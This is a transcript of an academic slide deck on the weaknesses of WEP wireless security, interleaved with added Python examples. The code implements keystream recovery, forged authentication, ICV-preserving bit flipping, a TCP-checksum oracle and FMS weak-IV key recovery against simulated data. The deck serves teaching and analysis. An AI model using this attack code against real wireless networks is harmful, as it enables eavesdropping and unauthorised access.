802.11 Security - PowerPoint PPT Presentation

About This Presentation
Title:

802.11 Security

Description:

802.11 Security Wired Equivalent Privacy (WEP) By. Shruthi B Krishnan ... Random IVs are not insisted upon. Short IVs. No protection for replay attacks ... – PowerPoint PPT presentation

Slides: 20
Provided by: shru3
Learn more at: http://www.cs.sjsu.edu

Transcript and Presenter's Notes


1
802.11 Security: Wired Equivalent Privacy (WEP)
By Shruthi B Krishnan

2
Agenda for the presentation
  • Introduction
  • 802.11 Wireless LAN brief description
  • Goals of WEP
  • Confidentiality in WEP
  • Data Integrity in WEP
  • Access Control in WLANs
  • Security loopholes and attacks on WEP
  • Lessons to be learnt

3
Introduction: history of wireless technology
  • Wireless networking began in 1971 at the University of Hawaii with ALOHAnet
  • Star topology with 7 computers
  • Spanned 4 Hawaiian islands, with the central system on Oahu
  • In 1997 the world's first WLAN standard, IEEE 802.11, was approved
  • Wired Equivalent Privacy (WEP) is the security mechanism specified in that standard
  • WEP has many loopholes and has been completely broken

4
802.11 Wireless LAN brief description

[Figure: mobile stations talk over the wireless medium to access points, which are joined together by the distribution system.]

  • Stations
  • Wireless medium
  • Access Points
  • Distribution System
  • Basic Service Set (BSS): one access point and the stations associated with it
  • Extended Service Set (ESS): several BSSs joined by a distribution system under one network name

5
802.11 Wireless LAN brief description (contd): Network services
  • Distribution system services
    • Association
    • Disassociation
    • Reassociation
  • Station services
    • Authentication
    • Deauthentication
    • Privacy

[Figure: station state machine. State 1: unauthenticated and unassociated (outside the network). Successful authentication moves the station to state 2: authenticated and unassociated; a successful association or reassociation moves it to state 3: authenticated and associated (inside the network). Disassociation drops it back to state 2, deauthentication back to state 1.]
6
Goals of WEP
  • Confidentiality: the RC4 stream cipher is used for encryption
  • Data integrity: a cyclic redundancy check (CRC-32) is used as the integrity value
  • Access control: shared-key authentication

7
Confidentiality in WEP
  • One-time pad vs stream ciphers: a stream cipher imitates a one-time pad, but the perfectly random pad is replaced by a pseudorandom keystream expanded from a short key
  • Perfect randomness (and with it perfect secrecy) is given up for practicality; the security now rests on the keystream generator and on never reusing a keystream
  • RC4 algorithm used for encryption of data frames: each frame is XORed with the keystream RC4 produces from the IV and the key

[Figure: Plaintext XOR Keystream = Ciphertext, where Keystream = RC4(IV || KEY).]
8
Confidentiality in WEP (contd): WEP keys and the Initialization Vector (IV)
  • Shared secret key
    • Shared among all users of the network
    • Changed infrequently (there is no key-management protocol, so rekeying is manual)
    • Original standard: 40-bit key; later implementations used a 104-bit key
    • WEP allows a set of up to 4 keys, selected per frame by a 2-bit key index
    • Key distribution problems
  • Initialization vector
    • 24 bits
    • Prepended to the secret key: RC4 is keyed with IV || key, so the per-frame key differs only in its first 3 bytes
    • Must differ for every frame, because the same IV under the same key produces the same keystream (an IV collision means keystream reuse)
    • Sent in clear, so an attacker can see which frames share a keystream

9
Data Integrity in WEP
  • Computes an Integrity Check Value (ICV) over the plaintext
  • ICV is appended to the data and encrypted together with it
  • CRC-32 algorithm used
  • Efficient at detecting random transmission errors, but not deliberate tampering: CRC-32 is linear and unkeyed, so a modification can be made to pass the check
  • Cryptographically insecure

10
Confidentiality and data integrity in WEP

[Figure: the 24-bit IV is prepended to the 40- or 104-bit key and fed to RC4; the plaintext and its CRC-32 ICV are XORed with the resulting keystream.]

Encrypted frame layout (after the 802.11 frame header):
  IV (3 bytes) | pad (6 bits) + key index (2 bits) | RC4-encrypted (plaintext || ICV (4 bytes))
11
Access Control in WLANs
  • Open System Authentication: any station that asks is authenticated; nothing is checked
  • Shared key authentication: a challenge-response using the WEP key

[Figure: Mobile station -> Access Point: request for access. Access Point -> Mobile station: challenge text R (128 bytes, sent in clear). Mobile station -> Access Point: R encrypted using WEP. The access point decrypts the response, compares it with R, and answers with success or failure.]
12
Security loopholes and attacks on WEP: Attacks on shared key authentication

[Figure: the attacker first watches a legitimate station authenticate.]
  Good guy -> Access Point: request for access
  Access Point -> Good guy: challenge text R1 (in clear)
  Good guy -> Access Point: C1 = R1 encrypted using WEP (the IV used is in clear)
  • Keystream = R1 XOR C1, and the attacker knows which IV it belongs to

[Figure: the attacker then authenticates without the key by reusing that IV.]
  Bad guy -> Access Point: request for access
  Access Point -> Bad guy: challenge text R2
  Bad guy -> Access Point: C2 = Keystream XOR R2, sent under the captured IV
  • The access point decrypts C2 with the same keystream, obtains R2, and accepts the attacker
13
Security loopholes and attacks on WEP (contd): Attacks due to keystream reuse

[Figure: C1 = P1 XOR Keystream and C2 = P2 XOR Keystream under the same IV, so C1 XOR C2 = P1 XOR P2; knowing one plaintext reveals the other.]

  • Improper IV management
    • IV space is small: 24 bits give at most 2^24 (about 16.7 million) keystreams per key; a busy access point exhausts them within hours, and randomly chosen IVs repeat with 50% probability after only about 5,000 frames (birthday bound)
    • Implementation dependent: the standard does not say how IVs are chosen, and some cards reset the IV to 0 on every initialisation, so the low IVs are reused constantly
    • Sent in clear, so the attacker can tell which frames share a keystream
  • Recovery of plaintexts: one known plaintext under an IV decrypts every other frame sent under that IV
  • Decryption dictionary attacks: collecting the keystream for each IV (at most 2^24 entries, about 25 GB at 1,500 bytes each) decrypts all further traffic by table lookup
  • Independent of key size: none of this gets harder with a 104-bit key
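As an added example, not part of the presentation, the following Python shows what slides 12 and 13 describe. RC4 itself is not needed for either attack, so the keystream the access point produces for the reused IV is modelled as a constructed random byte string that the attacker never sees directly; the IV, the challenge values and all function names are constructed for this example. One detail the slide glosses over is handled here: the challenge response is an ordinary WEP frame, so it carries an ICV, and the attacker can compute CRC-32 of the known challenge to recover keystream for those four bytes as well.

```python
import os
import struct
import zlib

IV = b"\x10\x20\x30"               # the IV the access point keeps reusing (constructed)
_AP_KEYSTREAM = os.urandom(256)   # stand-in for RC4(IV || secret key); the attacker never sees it


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP Integrity Check Value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data))


def wep_body(plaintext, keystream):
    """IV in clear, followed by (plaintext || ICV) XOR keystream."""
    return IV + xor_bytes(plaintext + icv(plaintext), keystream)


# --- the legitimate side: knows the key, i.e. can produce the keystream ---

def ap_encrypt(plaintext):
    return wep_body(plaintext, _AP_KEYSTREAM)


def ap_accepts_auth_response(challenge, response):
    """Shared-key authentication, final step, as the AP sees it:
    decrypt under the frame's IV, check the ICV, compare with the challenge it sent."""
    if response[:3] != IV:
        return False
    pt = xor_bytes(response[3:], _AP_KEYSTREAM)
    data, tag = pt[:-4], pt[-4:]
    return data == challenge and tag == icv(data)


# --- the attacker: no key, only sniffed frames ---

def recover_keystream(challenge, response):
    """Slide 12: the challenge R is sent in clear and the response is
    (R || CRC(R)) XOR keystream, so keystream = response XOR (R || CRC(R))."""
    return xor_bytes(response[3:], challenge + icv(challenge))


def forge_auth_response(keystream, new_challenge):
    """Answer a fresh challenge with the recovered keystream, under the same IV."""
    return wep_body(new_challenge, keystream)


def recover_second_plaintext(c1, known_p1, c2):
    """Slide 13: C1 XOR C2 = P1 XOR P2 when both frames were sent under one IV."""
    n = min(len(known_p1), len(c2) - 3 - 4)
    return xor_bytes(xor_bytes(c1[3:3 + n], c2[3:3 + n]), known_p1[:n])


def demo():
    challenge = os.urandom(128)                  # the AP's 128-byte challenge text (constructed)
    good_guy_response = ap_encrypt(challenge)    # the legitimate client answers with the real key
    ks = recover_keystream(challenge, good_guy_response)   # 132 bytes of keystream for this IV

    new_challenge = os.urandom(128)              # later the AP challenges the attacker
    forged = forge_auth_response(ks, new_challenge)
    authenticated = ap_accepts_auth_response(new_challenge, forged)

    # The same keystream also decrypts any data frame sent under that IV (up to 132 bytes)
    data_frame = ap_encrypt(b"GET /index.html HTTP/1.1\r\n")
    leaked = xor_bytes(data_frame[3:], ks)[:-4]
    return authenticated, leaked


if __name__ == "__main__":
    print(demo())
```

The keystream recovered from one authentication exchange is 132 bytes long, which is why the forged response works without ever touching RC4; a longer keystream for the same IV is obtained from any longer frame whose plaintext is known.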

14
Security loopholes and attacks on WEP (contd): Attacks due to CRC

[Figure: the attacker XORs a chosen difference Δ into the encrypted plaintext and Δc = CRC(Δ) into the encrypted ICV. After decryption the receiver sees P XOR Δ with ICV CRC(P) XOR CRC(Δ) = CRC(P XOR Δ), which verifies. With the real CRC-32, which has fixed initial and final XOR constants, the correction is CRC(Δ) XOR CRC(0...0) of the same length.]

  • CRC is good for detecting random transmission errors, but useless for message authentication
  • Both CRC-32 and RC4 encryption (XOR with a keystream) are linear, so a bit flipped in the ciphertext flips the same bit in the plaintext, and the matching change to the ICV can be computed without the key or the plaintext
  • CRC is unkeyed
  • An attacker who has recovered one keystream (previous slide) can also inject entirely new, correctly checksummed frames into the system

15
Security loopholes and attacks on WEP (contd): Attacks exploiting the Access Points

[Figure: the attacker captures an encrypted frame from the mobile station, flips the bits of its destination IP address (adjusting the ICV as on the previous slide) so that it points at a host the attacker controls, and retransmits it; the access point decrypts the frame and forwards the plaintext over the wired network to that host.]
16
Security loopholes and attacks on WEP (contd): Attacks exploiting the Access Points

[Figure: the attacker intercepts a ciphertext, flips bits Pi and Pi+16 (fixing the ICV), and sends it on through the access point; the mobile station answers with a TCP ACK only if the segment still checksums correctly.]

  • Access points can be used as an oracle on encrypted TCP/IP traffic
  • The recipient sends an ACK only if the TCP checksum is correct
  • The checksum is a ones'-complement sum of 16-bit words, so flipping bit i and bit i+16 (the same column of two adjacent words) leaves it unchanged exactly when Pi XOR Pi+16 is 1: one word gains 2^k and the other loses it
  • Attacker: modify any Pi and Pi+16, watch for the ACK, and learn one bit of plaintext (the XOR of the two bits) per trial, without the key
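An added example, not from the presentation, for slides 14 and 16 in Python: the ICV-preserving bit flip, and the TCP-checksum reaction attack built on top of it. The keystream is again a constructed random byte string standing in for RC4 output, the TCP segment is constructed (the pseudo-header is left out of the checksum for brevity; it is constant and does not affect the attack), the receiver is modelled as "ACK iff the ICV and the TCP checksum verify", and all function names are my own.

```python
import os
import struct
import zlib

_KEYSTREAM = os.urandom(128)   # stand-in for RC4(IV || key); the attacker never learns it
TCP_CHECKSUM_OFFSET = 16       # the checksum field of a TCP header is bytes 16-17


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data):
    return struct.pack("<I", zlib.crc32(data))


def wep_protect(plaintext):
    """(plaintext || ICV) XOR keystream; the IV is constant in this model and omitted."""
    return xor_bytes(plaintext + crc32_le(plaintext), _KEYSTREAM)


def wep_unprotect(ciphertext):
    """Receiver side: the plaintext, or None if the ICV does not verify."""
    pt = xor_bytes(ciphertext, _KEYSTREAM)
    data, tag = pt[:-4], pt[-4:]
    return data if tag == crc32_le(data) else None


def flip_bits(ciphertext, delta):
    """Slide 14. CRC-32 is affine over GF(2): crc(P ^ D) = crc(P) ^ crc(D) ^ crc(0^n).
    XOR D into the encrypted payload and crc(D) ^ crc(0^n) into the encrypted ICV,
    and the frame still verifies, with no key and no plaintext."""
    n = len(ciphertext) - 4
    delta_icv = xor_bytes(crc32_le(delta), crc32_le(bytes(n)))
    return xor_bytes(ciphertext, delta + delta_icv)


def delta_with_bits(n, positions):
    """n-byte mask with the given bit positions set (bit 0 is the MSB of byte 0)."""
    d = bytearray(n)
    for k in positions:
        d[k // 8] ^= 0x80 >> (k % 8)
    return bytes(d)


def internet_checksum(data):
    """RFC 1071: ones'-complement sum of 16-bit words, complemented; 0 means valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_tcp_segment(payload):
    """Constructed TCP segment: src 1234, dst 80, PSH|ACK, checksum over header+payload."""
    hdr = struct.pack("!HHIIBBHHH", 1234, 80, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    seg = hdr + payload
    csum = struct.pack("!H", internet_checksum(seg))
    return seg[:TCP_CHECKSUM_OFFSET] + csum + seg[TCP_CHECKSUM_OFFSET + 2:]


def receiver_acks(ciphertext):
    """Model of access point plus TCP stack: ACK only if ICV and TCP checksum both verify."""
    seg = wep_unprotect(ciphertext)
    return seg is not None and internet_checksum(seg) == 0


def reaction_attack_bit(ciphertext, k):
    """Slide 16. Flip plaintext bits k and k+16 (same column of two adjacent 16-bit
    words) and fix the ICV. The ones'-complement sum is unchanged iff the two bits
    differ (+2^m in one word, -2^m in the other), so an ACK means P_k XOR P_{k+16} = 1."""
    n = len(ciphertext) - 4
    return receiver_acks(flip_bits(ciphertext, delta_with_bits(n, [k, k + 16])))


def bit(data, k):
    return (data[k // 8] >> (7 - k % 8)) & 1


def demo():
    """Learn P_k XOR P_{k+16} for every k of an encrypted segment and compare with the truth."""
    seg = build_tcp_segment(b"secret data 42")   # constructed plaintext, even length
    ct = wep_protect(seg)
    nbits = 8 * len(seg) - 16
    learned = [reaction_attack_bit(ct, k) for k in range(nbits)]
    truth = [bit(seg, k) != bit(seg, k + 16) for k in range(nbits)]
    return learned == truth


if __name__ == "__main__":
    print("oracle recovered every XOR bit:", demo())
```

Each oracle query costs one retransmitted frame and leaks one linear relation between two plaintext bits; the relations across all k pin the whole segment down up to the 16 bits of the first word, which guessable headers supply.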
17
Security loopholes and attacks on WEP (contd): Attacks on RC4 as used by WEP
  • Research by Scott Fluhrer, Itsik Mantin and Adi Shamir on weaknesses in the RC4 key-scheduling algorithm
  • The first byte of the plaintext has to be known; for WEP it always is, because every data frame starts with the LLC/SNAP byte 0xAA
  • A class of weak IVs makes the first keystream byte leak one byte of the secret key, and because the IV is the first 3 bytes of the RC4 key and travels in clear, the attacker can pick out exactly the frames that use weak IVs
  • Format of weak IVs (for recovering key byte A, counting from 0):
    • First byte B = A + 3, so 0x03 to 0x07 for a 40-bit key (up to 0x0F for a 104-bit key)
    • Second byte has to be 0xFF
    • Third byte N can be any value from 0 to 255
  • Each such IV reveals key byte A with probability of about 5%, so the attacker tallies votes; about 60 different values of N per key byte are enough for the right byte to stand out. Key bytes are recovered in order, since each step needs the bytes before it
  • Several successful experiments based on this attack
  • Popular key-recovery programs like AirSnort use this analysis
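As an added example, not from the slides, the following Python ties slides 7 to 10 and 17 together: a minimal WEP-40 encryptor/decryptor (RC4 keystream from IV || key, CRC-32 ICV, 3-byte IV plus key-index byte in front of the ciphertext) and the Fluhrer-Mantin-Shamir weak-IV attack run against it. The key, the IVs, the frames and all function names are constructed for this example; the one fact taken from the page is that the first plaintext byte is the SNAP byte 0xAA. The attack goes slightly beyond the slide in two ways: it tests each IV for the general "resolved" key-schedule state instead of trusting the (A+3, 0xFF, N) shape blindly, and because the top vote is occasionally wrong it backtracks over the two best candidates per key byte, verifying a complete key against the ICV of one captured frame.

```python
import struct
import zlib
from collections import Counter

SNAP_FIRST_BYTE = 0xAA   # every 802.11 data frame carrying IP starts with the LLC/SNAP byte 0xAA


def rc4_ksa(key):
    """RC4 key-scheduling algorithm: permutes S under the (IV || key) bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key, n):
    """First n keystream bytes (PRGA)."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, plaintext, key_index=0):
    """Frame body after the 802.11 header: IV (3 bytes) || pad/key-index byte ||
    RC4_{IV||key}(plaintext || CRC-32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(plaintext))
    ks = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv + bytes([key_index & 3]) + xor_bytes(plaintext + icv, ks)


def wep_decrypt(key, body):
    """Plaintext, or None when the ICV fails (wrong key or tampered frame)."""
    iv, ct = body[:3], body[4:]
    pt = xor_bytes(ct, rc4_keystream(iv + key, len(ct)))
    data, icv = pt[:-4], pt[-4:]
    return data if icv == struct.pack("<I", zlib.crc32(data)) else None


def fms_vote(iv, known_key, z):
    """FMS: run the KSA over the A+3 known bytes only (IV plus recovered key bytes).
    In a 'resolved' state the first keystream byte z equals, with probability of
    about 5%, the value S[A+3] takes after the next KSA step, which depends only on
    key byte A. Returns the implied key byte, or None if the state is not resolved."""
    a = len(known_key)
    k = iv + known_key
    s = list(range(256))
    j = 0
    for i in range(a + 3):
        j = (j + s[i] + k[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
    if s[1] >= a + 3 or (s[1] + s[s[1]]) & 0xFF != a + 3:
        return None
    return (s.index(z) - j - s[a + 3]) & 0xFF


def fms_recover(first_bytes, key_len, check_body, fudge=2):
    """first_bytes: {iv: first ciphertext byte} sniffed for weak IVs (A+3, 0xFF, N).
    Votes key byte by key byte; the top `fudge` candidates are tried depth-first
    and a complete key is verified against the ICV of one captured frame."""
    def search(known):
        if len(known) == key_len:
            return known if wep_decrypt(known, check_body) is not None else None
        a = len(known)
        votes = Counter()
        for n in range(256):
            iv = bytes([a + 3, 0xFF, n])
            if iv in first_bytes:
                guess = fms_vote(iv, known, first_bytes[iv] ^ SNAP_FIRST_BYTE)
                if guess is not None:
                    votes[guess] += 1
        for candidate, _ in votes.most_common(fudge):
            found = search(known + bytes([candidate]))
            if found is not None:
                return found
        return None
    return search(b"")


def demo():
    """The victim sends one frame per weak IV; the attacker keeps the first ciphertext
    byte of each plus one full frame, and recovers the 40-bit key."""
    secret = bytes.fromhex("0badc0ffee")                     # constructed WEP-40 key
    sniffed = {}
    for a in range(len(secret)):
        for n in range(256):
            iv = bytes([a + 3, 0xFF, n])
            sniffed[iv] = wep_encrypt(secret, iv, b"\xaa\xaa\x03" + b"\x00" * 5)[4]
    frame = wep_encrypt(secret, b"\x01\x02\x03", b"\xaa\xaa\x03hello")
    return fms_recover(sniffed, len(secret), frame)


if __name__ == "__main__":
    print(demo().hex())
```

With 256 weak IVs per key byte the correct byte typically collects a dozen votes against a handful for the best wrong one; the resolved-state test discards the IVs whose key schedule was disturbed early, and the fudge factor is what real tools use to survive the cases where the tally still misleads.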

18
Lessons learnt from the failure of WEP
  • One key shared by all users of the system
  • Key is changed infrequently
  • No perfect forward secrecy: recovering the key exposes all previously recorded traffic
  • Manual key management
  • Keystream reuse due to non-random and short (24-bit) IVs; random IVs are not insisted upon
  • No protection against replay attacks
  • Use of an unkeyed CRC instead of a keyed MAC such as HMAC-SHA1
  • The cipher was used weakly: keying RC4 directly with IV || key exposes its key-scheduling weaknesses
  • WEP was not publicly reviewed before it became a standard
  • WEP is insecure!!

19
References
  • The Institute of Electrical and Electronics Engineers (IEEE) website, http://www.ieee.org
  • 802.11 Wireless Networks: The Definitive Guide, by Matthew S. Gast, O'Reilly
  • History of wireless, http://www.ac.aup.fr/a38972/final_projectIT338/history.html
  • Intercepting Mobile Communications: The Insecurity of 802.11, by Nikita Borisov, Ian Goldberg, and David Wagner, http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html
  • Weaknesses in the Key Scheduling Algorithm of RC4, by Scott Fluhrer, Itsik Mantin and Adi Shamir, http://www.crypto.com/papers/others/rc4_ksaproc.pdf